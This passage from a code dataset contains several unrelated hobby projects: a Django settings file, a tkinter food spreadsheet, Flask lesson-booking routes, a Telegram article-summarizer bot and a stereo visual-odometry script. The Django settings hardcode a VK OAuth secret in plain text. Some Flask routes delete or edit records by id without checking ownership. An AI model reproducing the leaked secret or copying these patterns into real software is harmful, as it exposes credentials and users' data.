\"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"examenarium.urls\"\n\nSOCIAL_AUTH_POSTGRES_JSONFIELD = True\nSOCIAL_AUTH_VK_OAUTH2_KEY = '7240344'\nSOCIAL_AUTH_VK_OAUTH2_SECRET = 'EiC09dNPbpLlUBjo6FxQ'\nSOCIAL_AUTH_VK_OAUTH2_SCOPE = ['email']\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": ['templates'],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n 'social_django.context_processors.backends'\n ]\n },\n }\n]\n\nWSGI_APPLICATION = \"examenarium.wsgi.application\"\n\n\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\" : \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\")\n }\n}\n\n# User substitution\n# https://docs.djangoproject.com/en/1.11/topics/auth/customizing/#auth-custom-user\n\nAUTH_USER_MODEL = 'main.User'\nAUTHENTICATION_BACKENDS = ['examenarium.auth.EmailBackend',\n 'social_core.backends.vk.VKOAuth2',\n 'django.contrib.auth.backends.ModelBackend',]\n\n# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n # {\"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\"},\n {\"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\"},\n # {\"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\"},\n # {\"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\"},\n]\n\n\n# https://docs.djangoproject.com/en/2.0/topics/i18n/\n\nLANGUAGES = (\n ('ru', 'Russian'),\n ('en', 'English'),\n)\n\nLANGUAGE_CODE = \"ru\"\n\nTIME_ZONE = \"Europe/Moscow\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATIC_URL = \"/static/\"\n\ndjango_heroku.settings(locals())\n\nLOGOUT_REDIRECT_URL = '/'\nLOGIN_REDIRECT_URL = '/account/profile'\n","repo_name":"keni0k/examenarium","sub_path":"examenarium/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4138501681","text":"from tkinter import *\n\n\nfrom tkinter import ttk\n\nimport startpage\n\nfrom utilities import *\n\nclass ViewFoodsPage(Frame):\n\t\"\"\"Pseudo spreadsheet for adding, deleting, and viewing all foods.\"\"\"\n\tdef __init__(self, parent, controller):\n\t\tFrame.__init__(self, parent)\n\n\t\t# The column headers\n\t\tself.HEADERS = ('name', 'ss', 'unit', 'cal', 'carb', 'fat', 'protein', 'fiber', 'sugar')\n\n\t\t# The number of columns in the sheet; equal to the number of headers\n\t\tself.width = len(self.HEADERS)\n\n\t\t# The padding to add at the end of each column width\n\t\tself.COL_PADDING = 3\n\n\t\t# The padding between controls\n\t\tself.PADY_CONTROLS = 5\n\n\t\t# The width that each column should be\n\t\tself.col_widths = []\n\n\t\t#Init each col width to 0\n\t\tfor w in range(self.width):\n\t\t\tself.col_widths.append(0)\n\t\tself._calc_col_widths()\n\n\t\t\n\n\t\t# Create frames (controls frame and cells frame)\n\t\tself.frame_controls = Frame(self)\n\t\tself.frame_cells = Frame(self)\n\n\t\t# Put the frames on the window\n\t\tself.frame_controls.grid(row=0, column=0, sticky=N, padx=(10, 0), pady=(10, 0))\n\t\tself.frame_cells.grid(row=0, column=1, sticky=N, padx=10)\n\n\n\t\t# Create controls\n\t\tbtn_back = ttk.Button(self.frame_controls, text=\"Back\", command=lambda: controller.show_frame(\"StartPage\")) \n\t\t\n\t\t# Label for displaying that changes were saved\n\t\tself.lbl_status = Label(self.frame_controls, text=\"\", fg=\"green\")\t\t\n\t\tbtn_delete_checked = ttk.Button(self.frame_controls, text=\"Delete\", command=self.delete_checked)\n\t\tbtn_save_changes = ttk.Button(self.frame_controls, text=\"Save changes\", command=self.save_changes)\n\n\n\t\t\n\t\t# Put the controls on the grid\n\t\tbtn_back.grid(row=0, column=0, pady=self.PADY_CONTROLS)\n\t\tself.lbl_status.grid(row=4, column=0, pady=self.PADY_CONTROLS, padx=10)\n\t\tbtn_delete_checked.grid(row=5, column=0, pady=self.PADY_CONTROLS)\n\t\tbtn_save_changes.grid(row=6, column=0, pady=self.PADY_CONTROLS, padx=12) # padx of 10 to make optionmenus' size static\n\n\t\t# List of lists for the rows of cells in the sheet\n\t\t# each element in this list is a list of Entry widgets; each is a row. Each Entry in a row is a cell.\n\t\tself.rows = {}\n\n\t\t# List of lists. Rows (inner lists) are: [, ]\n\t\tself.checkbuttons = []\n\n\n\t\t# Create the sheet\n\t\tself.draw_sheet()\n\n\n\tdef draw_sheet(self):\n\t\t\"\"\"Draws the sheet; used for initializing the sheet.\n\t\tIf there are no foods to display, then a message is displayed to the user.\"\"\"\n\n\t\tall_foods = fooditemdao.retrieve_all_foods()\n\n\t\tif not all_foods:\n\t\t\treturn False\n\n\t\tself.create_col_headers()\n\n\t\tfor food in all_foods:\n\t\t\trow = self._draw_row(food)\n\n\n\tdef create_col_headers(self):\n\t\t\"\"\"Creates and places Labels with the column headers in row 0 of frame_cells\"\"\"\n\t\tfor i in range(self.width):\n\t\t\tl = Label(self.frame_cells, text=self.HEADERS[i].upper(), font=MONOSPACED_FONT)\n\t\t\tl.grid(row=0, column=i+1)\n\n\n\tdef _draw_row(self, food):\n\t\t\"\"\"Creates and draws a row in the sheet.\n\t\tEach cell will be filled with the appropriate data based on arg food.\"\"\"\n\n\t\trow = {}\n\t\tcb_var = IntVar()\n\t\tcb = ttk.Checkbutton(self.frame_cells, var=cb_var)\n\t\tcb.grid(row=len(self.rows)+1, column=0)\n\t\trow['cb'] = cb\n\t\trow['cb_var'] = cb_var\n\t\tfor i, h in enumerate(self.HEADERS):\n\t\t\te = ttk.Entry(self.frame_cells, font=MONOSPACED_FONT, width=self.col_widths[i])\n\t\t\te.insert(0, food.info[h])\n\t\t\tif i == 0:\n\n\t\t\t\te.config(foreground=\"black\", state=DISABLED)\n\t\t\trow[f\"{h}_entry\"] = e\n\t\t\te.grid(row=len(self.rows)+1, column=i+1)\n\t\tself.rows[food.name] = row\n\n\t\t\n\n\tdef _calc_col_widths(self):\n\t\t\"\"\"Calculates how wide columns need to be based on headers and avail data (if any)\"\"\"\n\n\t\t# Set the widths based on the headers\n\t\tfor i in range(self.width):\n\t\t\tself.col_widths[i] = len(self.HEADERS[i])\n\n\t\t# Set the widths based on the headers or the longest piece of data; whichever is longer\n\t\tall_foods = fooditemdao.retrieve_all_foods()\n\t\tif all_foods:\n\t\t\tfor i in range(self.width):\n\t\t\t\tfor food in all_foods:\n\t\t\t\t\tself.col_widths[i] = max(self.col_widths[i], len(str(food.info[self.HEADERS[i]])))\n\n\t\t# Add padding to the widths\n\t\tfor i in range(self.width):\n\t\t\tself.col_widths[i] += self.COL_PADDING\n\n\n\tdef _is_sheet_filled_out(self):\n\t\t\"\"\"Returns False if there are no rows/foods or if there are \n\t\tcells that are empty.\n\t\tElse returns True.\n\t\t\"\"\"\n\t\tif not self.rows:\n\t\t\treturn False\n\t\tfor row in self.rows.values():\n\t\t\tfor key in row.keys():\n\t\t\t\tif key == 'cb' or key == 'cb_var':\n\t\t\t\t\tcontinue\n\t\t\t\ttext = row[key].get()\n\t\t\t\tif text == '':\n\t\t\t\t\tmessagebox.showerror(\"Empty Cells Found\", \"Please fill out every cell\")\n\t\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\n\tdef delete_checked(self):\n\t\t\"\"\"Goes through the rows and finds all rows where the CB is selected.\n\t\tAdds the names of these rows to a list, then goes through the list and deletes\n\t\t(destroys) each row and removes the row dict from self.rows and deletes\n\t\tthe row's food from the DB.\"\"\"\n\n\t\t# list of names of foods to delete\n\t\tto_delete = []\n\n\t\t# finds which rows to mark for deletion\n\t\tfor key in self.rows.keys():\n\t\t\tif self.rows[key]['cb_var'].get() == 1:\n\t\t\t\tto_delete.append(self.rows[key]['name_entry'].get())\n\n\t\t# destroys and removes the rows marked for deletion\n\t\tfor key in to_delete:\n\t\t\tself._delete_row(self.rows[key], True)\n\n\t\t\t# deletes the food from fooditem DB\n\t\t\tfooditemdao.delete_food(key)\n\t\t\tproductdao.delete_product_by_foodname(key)\n\t\t\tmealdao.delete_food_with_name(key)\n\n\n\n\tdef _get_all_foods_from_sheet(self):\n\t\t\"\"\"Returns a list of FoodItems based off what's in the sheet\"\"\"\n\t\tfoods = []\n\n\t\tif not self._is_sheet_filled_out():\n\t\t\treturn False\n\n\t\tfor row in self.rows.values():\n\t\t\tfood = self._create_fooditem_from_row_dict(row)\n\t\t\tfoods.append(food)\n\n\t\treturn foods\n\n\tdef _create_fooditem_from_row_dict(self, row_dict):\n\t\t\"\"\"Returns a FoodItem representing the arg row_dict.\"\"\"\n\t\tfood = FoodItem()\n\t\tinfos = ('name_entry', 'ss_entry', 'unit_entry', 'cal_entry', 'carb_entry', \n\t\t\t\t'fat_entry', 'protein_entry', 'fiber_entry', 'sugar_entry')\n\t\tfood_info = []\n\t\tfor key in row_dict.keys():\n\t\t\tif key in infos:\n\t\t\t\tfood_info.append(row_dict[key].get())\n\t\tfood.set_info_from_string_list(food_info)\n\t\treturn food\n\n\tdef _get_food_from_current_row(self, row):\n\t\t\"\"\"Returns a FoodItem from info in arg row.\n\t\tChecking for validity of row should be done before calling this func.\"\"\"\n\t\tinfo = []\n\t\tfood = FoodItem()\n\t\tfor e in row:\n\t\t\tinfo.append(e.get())\n\t\tfood.set_info_from_string_list(info)\n\t\treturn food\n\n\n\n\n\t\t\n\tdef save_changes(self):\n\t\t# Validate all data in the sheet\n\t\t# Returns False early if any validation failss\n\n\t\t# Checks if every row is either totally full or totally empty\n\t\tif not self._is_sheet_filled_out():\n\t\t\treturn False\n\n\t\t# Checks that all number columns have valid data (no chars, no negatives)\n\t\tif not self.validate_number_columns():\n\t\t\treturn False\n\n\t\t# Update the fooditem and product DB.\n\t\tself.update_databases()\n\n\t\t# Recalculate column widths in case of name changes\n\t\tself._calc_col_widths()\n\n\t\t# clear rows and redraw sheet\n\t\tself.reset()\n\n\t\treturn True\n\n\n\n\tdef update_databases(self):\n\t\t\"\"\"Checks which foods have been modified (all but name can be changed).\n\t\tIf none were changed, 'No changes' is displayed.\n\t\tElse, changes are saved to the db and 'Changes saved' is displayed.\"\"\"\t\n\t\tsheet_foods = self._get_all_foods_from_sheet()\n\n\t\tdb_foods = fooditemdao.retrieve_all_foods()\n\t\tchanges_made = False\n\t\tfor i in range(len(db_foods)):\n\n\t\t\tif not sheet_foods[i].is_info_same(db_foods[i]):\n\t\t\t\tfood = sheet_foods[i]\n\t\t\t\tfooditemdao.update_food(sheet_foods[i], sheet_foods[i].name)\n\t\t\t\tchanged_product = Product()\n\t\t\t\tself.update_product_db(food)\n\t\t\t\tchanges_made = True\n\t\tif changes_made:\n\t\t\tself.lbl_status.config(text=\"Changes saved\")\n\n\t\telse:\n\t\t\tself.lbl_status.config(text=\"No changes\")\n\t\tself.lbl_status.after(2000, lambda: self.lbl_status.config(text=\"\"))\n\n\n\tdef update_product_db(self, food):\n\t\tif self._is_unit_different(food):\n\t\t\told_product = productdao.retrieve_products_by_name(food.name)[0]\n\n\t\t\ttup = (old_product.foodname, old_product.amount, food.unit, old_product.cost)\n\t\t\tnew_product = Product()\n\t\t\tnew_product.set_info_from_tuple(tup)\n\t\t\tproductdao.update_product(new_product)\n\n\n\n\tdef _is_unit_different(self, food):\n\t\t\"\"\"Checks if the arg food has a different unit than\n\t\tthe same row in the products DB's unit.\"\"\"\n\t\tproduct = productdao.retrieve_products_by_name(food.name)[0]\n\t\tif product.unit == food.unit:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\tdef validate_number_columns(self):\n\t\t\"\"\"Validates the cells of a row in a number column.\n\t\tA number column is a column where the data should only be a number\n\t\t(and a positive one)\"\"\"\n\n\t\t# First check if any cells are empty\n\t\tif not self._is_sheet_filled_out():\n\t\t\treturn False\n\n\t\tnum_cols = ('ss', 'cal', 'carb', 'fat', 'protein', 'fiber', 'sugar')\n\t\tfor row in self.rows.values():\n\t\t\tfor key in row.keys():\n\t\t\t\tif key in num_cols:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tfloat(row[key].get())\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tmessagebox.showerror(f\"Error\", f\"Values in '{key}' column must be a valid number.\")\n\t\t\t\t\t\treturn False\n\t\t\t\t\tif float(row[key].get()) < 0:\n\t\t\t\t\t\tmessagebox.showerror(f\"Error\", f\"Values in column '{key}' must be positive.\")\n\t\t\t\t\t\treturn False\n\t\treturn True\n\n\tdef _has_duplicate_names(self):\n\t\t\"\"\"Returns False if all names in the sheet are unique\n\t\tDisplays an error and returns True otherwise.\n\t\tIt is case sensitive (names can be the same if different capitalization)\n\t\tDoesn't validate is rows are empty or not because this should be done before\n\t\tcalling this function.\"\"\"\n\t\tname_set = set()\n\t\tfor row in self.rows:\n\t\t\tname = row[0].get()\n\t\t\tif name in name_set:\n\t\t\t\tmessagebox.showerror(\"Duplicate names not allowed\", f\"Food named '{name}' exists more than once\")\n\t\t\t\treturn True\n\t\t\tif name != \"\":\n\t\t\t\tname_set.add(name)\n\t\treturn False\n\n\tdef _delete_row(self, row_dict, pop):\n\t\t\"\"\"\n\t\trow_dict -> dictionary\n\t\tpop -> boolean\n\t\tDestroys row based on arg row_dict. If pop is True, pops the row from self.rows\"\"\"\n\t\t# saves name for later reference\n\t\tname = row_dict['name_entry'].get()\n\n\t\t# destroys all widgets in row\n\t\tfor key in row_dict.keys():\n\t\t\tif key == 'cb_var':\n\t\t\t\tcontinue\n\t\t\trow_dict[key].destroy()\n\n\t\t# removes row from self.rows if pop\n\t\tif pop:\n\t\t\tself.rows.pop(name)\n\t\t\n\n\n\tdef clear_sheet(self):\n\t\t\"\"\"Removes all cells/entries from the sheet and empties self.rows\"\"\"\n\t\tfor row_dict in self.rows.values():\n\t\t\tself._delete_row(row_dict, False)\n\n\t\tself.rows = {}\n\t\t\n\n\tdef reset(self):\n\t\t\"\"\"Removes all rows from the sheet, empties self.rows, and creates the sheet from scratch\"\"\"\n\t\tself.clear_sheet()\n\t\tself.draw_sheet()","repo_name":"cgregurich/PythonFoodApp2","sub_path":"viewfoodspage.py","file_name":"viewfoodspage.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28594625774","text":"from flask import render_template, url_for, flash, redirect, request\nfrom lessonfinder import app, db, user_manager\nfrom lessonfinder.form import SearchForm, SignupForm, RegistrationForm, levels, \\\n UpdateUsernameForm, EditRegistrationForm\nfrom lessonfinder.models import User, Participant, Lesson\nfrom flask_user import current_user, login_required, roles_required\nfrom sqlalchemy import or_\n\n\n@app.route(\"/\")\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n if current_user.is_authenticated and current_user.roles == 'user':\n return redirect(url_for('profile'))\n form = SignupForm()\n if form.validate_on_submit():\n user = User(active=True, fName=form.fName.data, lName=form.lName.data, email=form.email.data, birthday=form.birthday.data,\n username=form.username.data, password=user_manager.hash_password(form.password.data))\n db.session.add(user)\n db.session.commit()\n flash(f'Account created for {form.username.data}!', 'success')\n return redirect(url_for('user.login'))\n return render_template('signup_page.html', title='Sign Up', form=form)\n\n\n@app.route(\"/results\")\ndef search_results(results):\n return render_template('search_results.html', title='Results', results=results)\n\n\n@app.route(\"/search\", methods=['GET', 'POST'])\ndef search():\n form = SearchForm()\n level_choice = dict(levels).get(form.level.data)\n if form.validate_on_submit():\n results = Lesson.query.filter(or_(Lesson.location == form.location.data,\n Lesson.startDate == form.startDate.data,\n Lesson.startTime == form.startTime.data,\n Lesson.day == form.day.data,\n Lesson.level == level_choice))\n if len(results.all()) == 0:\n flash('Your search did not yield any results. Please try again.', 'danger')\n else:\n return search_results(results)\n return render_template('search_lessons.html', title='Search', form=form)\n\n\n@app.route('/register_yourself/', methods=['GET', 'POST'])\n@login_required\ndef register_yourself(lesson_id):\n lesson = Lesson.query.get_or_404(lesson_id)\n if lesson in current_user.lessons:\n flash(f'You are already registered for this lesson. Please search for another one.', 'danger')\n return redirect('/search')\n else:\n current_user.lessons.append(lesson)\n db.session.commit()\n flash(f'You have successfully registered!', 'success')\n return redirect('/profile')\n\n\n@app.route(\"/register/\", methods=['GET', 'POST'])\n@login_required\ndef register(lesson_id):\n form = RegistrationForm()\n lesson = Lesson.query.get_or_404(lesson_id)\n if form.validate_on_submit():\n dependents = current_user.dependents\n dependent = Participant(fName=form.fName.data, lName=form.lName.data, contactNum=form.contactNum.data,\n contactEmail=form.contactEmail.data)\n if not dependents:\n current_user.dependents.append(dependent)\n dependent.lessons.append(lesson)\n db.session.add(dependent)\n db.session.commit()\n flash(f'Your dependent has been registered!', 'success')\n return redirect(url_for('profile'))\n elif dependents:\n exists = False\n for dep in dependents:\n if dep.fName == dependent.fName and dep.lName == dependent.lName:\n exists = True\n existingDep = dep\n break\n if exists:\n if lesson in existingDep.lessons:\n flash(f'You\\'re dependent is already registered for this lesson. Please search for another one.', 'danger')\n return redirect('/search')\n else:\n existingDep.lessons.append(lesson)\n db.session.commit()\n flash(f'Your dependent has been registered!', 'success')\n return redirect(url_for('profile'))\n else:\n current_user.dependents.append(dependent)\n dependent.lessons.append(lesson)\n db.session.add(dependent)\n db.session.commit()\n flash(f'Your dependent has been registered!', 'success')\n return redirect(url_for('profile'))\n return render_template('register.html', title='Register', form=form, lesson=lesson)\n\n\n@app.route(\"/unregister//delete\", methods=['POST'])\n@login_required\ndef unregister_user(lesson_id):\n lesson = Lesson.query.get_or_404(lesson_id)\n for user in lesson.selfParticipant:\n if current_user.id == user.id:\n lesson.selfParticipant.remove(user)\n db.session.commit()\n flash(f'You have successfully unregistered from ' + lesson.name, 'success')\n break\n else:\n continue\n return redirect(url_for('profile'))\n\n\n@app.route(\"/unregister_dep//delete/\", methods=['POST'])\n@login_required\ndef unregister_dep(lesson_id, dep_id):\n lesson = Lesson.query.get_or_404(lesson_id)\n dependent = Participant.query.get_or_404(dep_id)\n dependent.lessons.remove(lesson)\n db.session.commit()\n return redirect(url_for('profile'))\n\n\n@app.route(\"/dep_lesson_info//\")\n@login_required\ndef dep_lesson_info(lesson_id, dep_id):\n lesson = Lesson.query.get(lesson_id)\n dependent = Participant.query.get(dep_id)\n return render_template('dep_lesson_info.html', title=\"Information\", lesson=lesson, dependent=dependent)\n\n\n@app.route(\"/lesson_info/\")\n@login_required\ndef lesson_info(lesson_id):\n lesson = Lesson.query.get(lesson_id)\n return render_template('lesson_info.html', title=\"Information\", lesson=lesson)\n\n\n@app.route(\"/profile\")\n@login_required\ndef profile():\n if current_user.is_authenticated:\n lessons = current_user.lessons\n dependents = current_user.dependents\n depLessons = []\n for dependent in dependents:\n for lesson in dependent.lessons:\n depLessons.append(lesson)\n return render_template('profile.html', title=\"Profile\",\n lessons=lessons, dependents=dependents, depLessons=depLessons)\n\n\n@app.route(\"/edit_registration/\", methods=['GET', 'POST'])\n@login_required\ndef edit_registration(dep_id):\n form = EditRegistrationForm()\n dep = Participant.query.get_or_404(dep_id)\n if form.validate_on_submit():\n update_registration_helper(form, dep)\n flash(f'Registration updated successfully.', 'success')\n return redirect(url_for('profile'))\n return render_template('edit_registration.html', title=\"Edit\", form=form, dep=dep)\n\n\ndef update_registration_helper(form, dep):\n if form.contactNum.data:\n dep.contactNum = form.contactNum.data\n if form.contactEmail.data:\n dep.contactEmail = form.contactEmail.data\n db.session.commit()\n\n\n@app.route('/update_username', methods=['GET', 'POST'])\n@login_required\ndef update_username():\n form = UpdateUsernameForm()\n user = current_user\n if form.validate_on_submit():\n user.username = form.username.data\n db.session.commit()\n flash(f'Username was successfully changed!', 'success')\n return redirect(url_for('profile'))\n return render_template('edit_username.html', title='Change Username', form=form)\n\n\n@app.route('/remove_dep/', methods=['POST'])\n@login_required\ndef remove_dep(dep_id):\n dependent = Participant.query.get_or_404(dep_id)\n db.session.delete(dependent)\n db.session.commit()\n flash(f'Dependent was successfully deleted.', 'success')\n return redirect(url_for('profile'))\n","repo_name":"klark17/FlaskProject","sub_path":"lessonfinder/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5246805813","text":"import telegram\nimport recapper\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport logging\nimport re\n\n\ndef start(bot, update):\n bot.send_message(chat_id=update.message.chat_id,\n text=\"I'm summarize.me, you send me url to an article you want to read, I send you a short \"\n \"recap, a good deal isn't it? \"\n \"\"\n \"If you want to know how i'm made, please visit https://github.com/Tsadoq/summarize.me\"\n \"To use me, send me a link to the article you want to have a recap and a number between 0 \"\n \"and 1 (e.g. 0.3) to have a shorter or longer summary\")\n\n\ndef startup(tkn):\n updater = Updater(token=tkn)\n dispatcher = updater.dispatcher\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n print('starting up the bot')\n return updater, dispatcher\n\n\ndef summarize(bot, update):\n print('Article received')\n chat_id = update.message.chat_id\n text = update.message.text\n [url, perc] = text.split(\" \")\n if re.match(r'^-?\\d+(?:\\.\\d+)?$', perc) is None:\n txt = \"The message has been sent with the wrong syntax, it should be in the form of \" \\\n \"'www.example.com/somearticle 0.3' \"\n bot.send_message(chat_id=update.message.chat_id, text=txt)\n else:\n txt = \"Article received, processing, this process could take upt to 30 seconds\"\n bot.send_message(chat_id=update.message.chat_id, text=txt)\n r = recapper.Recapper(url)\n r.process()\n recap = r.summarize(perc=perc)\n bot.send_message(chat_id=update.message.chat_id, text=f\"{r.article.title} - RECAP\\n\\n\",\n parse_mode=telegram.ParseMode.HTML)\n bot.send_message(chat_id=update.message.chat_id, text=recap)\n bot.send_message(chat_id=update.message.chat_id, text='\\n\\n The Hosting of the bot is quite expensive, if you could help me pay it that would be great :) ',parse_mode=telegram.ParseMode.HTML)\n r.get_info()\n\n\n\ndef main():\n tkn = open('token.txt', 'r').readline()\n updater, dispatcher = startup(tkn)\n start_handler = CommandHandler('start', start)\n dispatcher.add_handler(MessageHandler(Filters.text, summarize))\n dispatcher.add_handler(start_handler)\n updater.start_polling()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Tsadoq/summarize.me","sub_path":"summarizeme.py","file_name":"summarizeme.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41632695382","text":"import numpy as np\nimport cv2\n\nimport glob\nimport os\n\nimport time\nimport argparse\n\nfrom collections import defaultdict\nfrom scipy.optimize import least_squares\nfrom math import cos, sin\n\nL = 0\n\nR = 1\n\nIMSIZE = (1241, 376)\n\ndef getGt(txt):\n \"\"\" \n Parses calib.txt in Kitti dataset\n \n Parameters: \n txt (string): path to calib.txt file\n \n Returns: \n 2 np arrays containing left and right Projective matrix\n \"\"\"\n with open(txt, 'r') as f:\n lines = f.readlines()\n for line in lines:\n if 'P0' in line:\n p0 = line.split(':')[1][1:]\n p0 = p0.split(' ')\n assert len(p0)==12\n p0 = list(map(float, p0))\n elif 'P1' in line:\n p1 = line.split(':')[1][1:]\n p1 = p1.split(' ')\n assert len(p1)==12\n p1 = list(map(float, p1))\n\n return np.asarray(p0).reshape(3,4), np.asarray(p1).reshape(3,4)\n\n\n\ndef estDisparity(imgL,imgR,engine):\n \"\"\" \n Calculates disparity using left and right images, using an engine with predescribed parameters\n \n Parameters: \n imgL : Left Image\n imgR : Right Image\n Engine : Disparity engine to be used\n \n Returns: \n disparity map\n \"\"\"\n return np.divide(engine.compute(imgL,imgR).astype(np.float32),16.0)\n\n\ndef fastDetect(img1L,img2L,feature_detector = 0):\n \"\"\" \n Feature detection\n \n Parameters: \n img1L : Left image of first frame\n img2L : Left image of second frame\n feature detector : 0 = FAST 1 = GFTT\n \n Returns: \n matched features in left and right images\n \"\"\"\n H,W = img1L.shape\n TILE_H = 10\n TILE_W = 20\n kp = []\n\n if(feature_detector == 0):\n featureEngine = cv2.FastFeatureDetector_create()\n \n for y in range(0, H, TILE_H):\n for x in range(0, W, TILE_W):\n imPatch = img1L[y:y+TILE_H, x:x+TILE_W]\n keypoints = featureEngine.detect(imPatch)\n for pt in keypoints:\n pt.pt = (pt.pt[0] + x, pt.pt[1] + y)\n if (len(keypoints) > 10):\n keypoints = sorted(keypoints, key=lambda x: -x.response)\n for kpt in keypoints[0:10]:\n kp.append(kpt)\n else:\n for kpt in keypoints:\n kp.append(kpt)\n\n if(feature_detector == 1):\n featureEngine = cv2.GFTTDetector_create(maxCorners=4000, minDistance=8.0, qualityLevel=0.001, useHarrisDetector=False)\n keypoints = featureEngine.detect(img1L)\n \n for kpt in keypoints:\n kp.append(kpt)\n\n\n features1 = cv2.KeyPoint_convert(kp)\n features1 = np.expand_dims(features1, axis=1)\n\n # Parameters for lucas kanade optical flow\n lk_params = dict( winSize = (15,15),\n maxLevel = 3,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 50, 0.03))\n\n features2, st, err = cv2.calcOpticalFlowPyrLK(img1L, img2L, features1, None, flags=cv2.MOTION_AFFINE, **lk_params)\n\n # separate points that were tracked successfully\n ptTrackable = np.where(st == 1, 1,0).astype(bool)\n features1_KLT = features1[ptTrackable, ...]\n features2_KLT = features2[ptTrackable, ...]\n features2_KLT = np.around(features2_KLT)\n\n # among tracked points take points within error measue\n error = 4\n errTrackablePoints = err[ptTrackable, ...]\n errThresholdedPoints = np.where(errTrackablePoints < error, 1, 0).astype(bool)\n features1_KLT = features1_KLT[errThresholdedPoints, ...]\n features2_KLT = features2_KLT[errThresholdedPoints, ...]\n\n\n # check for validity of tracked point Coordinates\n hPts = np.where(features2_KLT[:,1] >= H)\n wPts = np.where(features2_KLT[:,0] >= W)\n outTrackPts = hPts[0].tolist() + wPts[0].tolist()\n outDeletePts = list(set(outTrackPts))\n\n if len(outDeletePts) > 0:\n features1_KLT_L = np.delete(features1_KLT, outDeletePts, axis=0)\n features2_KLT_L = np.delete(features2_KLT, outDeletePts, axis=0)\n else:\n features1_KLT_L = features1_KLT\n features2_KLT_L = features2_KLT\n\n return features1_KLT_L,features2_KLT_L\n\ndef featureEliminator(img1_disparity,img2_disparity,kp1_matched,kp2_matched,disparityMinThres = 0.0, disparityMaxThres = 100.0):\n \"\"\" \n Calculate 3d positions of the keypoints and eliminates the illegal ones\n \n Parameters: \n img1_disparity : disparity map for first stereo pair\n img2_disparity : disparity map for first stereo pair\n kp1_matched : matched fetaures for 1st pair\n kp2_matched : matched features for 2nd pair\n disparityMinThres: Minimum disparity that is considered legal\n disparityMaxThres: Maximum disparity that is considered legal\n \n Returns: \n Legal features, and their positions on left and right images\n \"\"\"\n kps1L = kp1_matched\n kps2L = kp2_matched\n\n kps1R = np.copy(kp1_matched)\n kps2R = np.copy(kp2_matched)\n\n valPoints = np.zeros(kps1L.shape[0])\n\n for i in range(kps1L.shape[0]):\n disp1 = img1_disparity[int(kps1L[i,1]), int(kps1L[i,0])]\n disp2 = img2_disparity[int(kps2L[i,1]), int(kps2L[i,0])]\n \n if (disp1 > disparityMinThres and disp1 < disparityMaxThres \n and disp2 > disparityMinThres and disp2 < disparityMaxThres):\n kps1R[i, 0] = kps1L[i, 0] - disp1\n kps2R[i, 0] = kps2L[i, 0] - disp2\n valPoints[i] = 1\n \n valPoints = valPoints.astype(bool)\n\n return kps1L[valPoints, ...],kps1R[valPoints, ...],kps2L[valPoints, ...],kps2R[valPoints, ...]\n\ndef triangulate3D(features_L_3d,features_R_3d,numPoints,Proj1,Proj2):\n \"\"\" \n Triangulate the points\n \n Parameters: \n features_L_3d : Features in Left image \n features_R_3d : Features in RIght Image\n numPoints : Len of features\n Proj1 : K[R|T] matrix of left camera\n Proj2 : K[R|T] matrix of Right camera\n \n Returns: \n 3d points\n \"\"\"\n\n Features3d = np.ones((numPoints,3))\n\n for i in range(numPoints):\n #for i in range(1):\n pLeft = features_L_3d[i,:]\n pRight = features_R_3d[i,:]\n \n X = np.zeros((4,4))\n X[0,:] = pLeft[0] * Proj1[2,:] - Proj1[0,:]\n X[1,:] = pLeft[1] * Proj1[2,:] - Proj1[1,:]\n X[2,:] = pRight[0] * Proj2[2,:] - Proj2[0,:]\n X[3,:] = pRight[1] * Proj2[2,:] - Proj2[1,:]\n \n _,_,V = np.linalg.svd(X)\n\n Features3d[i, :] = (V[-1]/V[-1,-1]).T[:-1]\n\n return Features3d\n\n\ndef generateAdjMatrix(Features3d1,Features3d2,tolerance=0.2):\n \"\"\" \n Generates adjacency matrix for clique detection\n \n Parameters: \n Features3d1 : Features in 1st Image\n Features3d2 : Features in 2nd image\n tolerance : allowed tolerance\n \n Returns: \n Adjacency matrix \n \"\"\"\n\n numPoints = Features3d1.shape[0]\n W = np.zeros((numPoints, numPoints))\n\n # diff of pairwise euclidean 